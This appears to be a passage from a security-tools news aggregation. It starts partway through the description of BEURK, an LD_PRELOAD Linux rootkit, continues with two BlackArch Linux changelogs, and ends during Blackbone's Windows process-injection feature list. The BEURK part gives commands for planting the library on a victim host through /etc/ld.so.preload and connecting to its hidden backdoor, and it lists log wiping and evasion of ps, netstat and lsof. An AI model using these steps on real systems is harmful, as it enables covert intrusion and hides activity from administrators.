- Realtime log cleanup (on utmp/wtmp)

- Anti process and login detection

- Bypass unhide, lsof, ps, ldd, netstat analysis

- Furtive PTY backdoor client

Upcoming features

- ptrace(2) hooking for anti-debugging

- libpcap hooking undermines local sniffers

- PAM backdoor for local privilege escalation

Usage

- Compile

git clone https://github.com/unix-thrust/beurk.git

cd beurk

make

- Install

scp libselinux.so root@victim.com:/lib/

ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'

- Enjoy !

./client.py victim_ip:port # connect with furtive backdoor

Dependencies

The following packages are not required in order to build BEURK at the moment:

- libpcap - to avoid local sniffing

- libpam - for local PAM backdoor

- libssl - for encrypted backdoor connection

apt-get install libpcap-dev libpam-dev libssl-dev

BlackArch Linux v2015.07.31 - Penetration Testing Distribution

BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1239 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

The new ISOs include over 1230 tools for i686 and x86_64 and over 1010 tools. For more details see the ChangeLog below.

Changelog v2015.07.31

- added more than 30 new tools

- updated system packages including linux kernel 4.1.3

- updated all tools

- added new color config for vim

- replaced splash.png

- deleted blackarch-install.txt

- updated /root/README

- fixed typos in ISO config files

BlackArch Linux v2015.11.24 - Penetration Testing Distribution

BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1308 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

The BlackArch Live ISO contains multiple window managers.

ChangeLog v2015.11.24:

- added more than 100 new tools

- updated system packages

- include linux kernel 4.2.5

- updated all tools

- updated menu entries for window managers

- added (correct) multilib support

- added more fonts

- added missing group 'vboxsf'

Blackbone - Windows Memory Hacking Library

Blackbone, Windows Memory Hacking Library


Features

- x86 and x64 support

- Process interaction

  - Manage PEB32/PEB64

  - Manage process through WOW64 barrier

- Process Memory

  - Allocate and free virtual memory

  - Change memory protection

  - Read/Write virtual memory

- Process modules

  - Enumerate all (32/64 bit) modules loaded. Enumerate modules using Loader list/Section objects/PE headers methods.

  - Get exported function address

  - Get the main module

  - Unlink module from loader lists

  - Inject and eject modules (including pure IL images)

  - Inject 64bit modules into WOW64 processes

  - Manually map native PE images

- Threads

  - Enumerate threads

  - Create and terminate threads. Support for cross-session thread creation.

  - Get thread exit code

  - Get main thread

  - Manage TEB32/TEB64

  - Join threads

  - Suspend and resume threads

  - Set/Remove hardware breakpoints

- Pattern search

  - Search for arbitrary pattern in local or remote process

- Remote code execution

  - Execute functions in remote process

  - Assemble own code and execute it remotely

  - Support for cdecl/stdcall/thiscall/fastcall conventions

  - Support for arguments passed by value, pointer or reference, including structures

  - FPU types are supported

  - Execute code in new thread or any existing one

- Remote hooking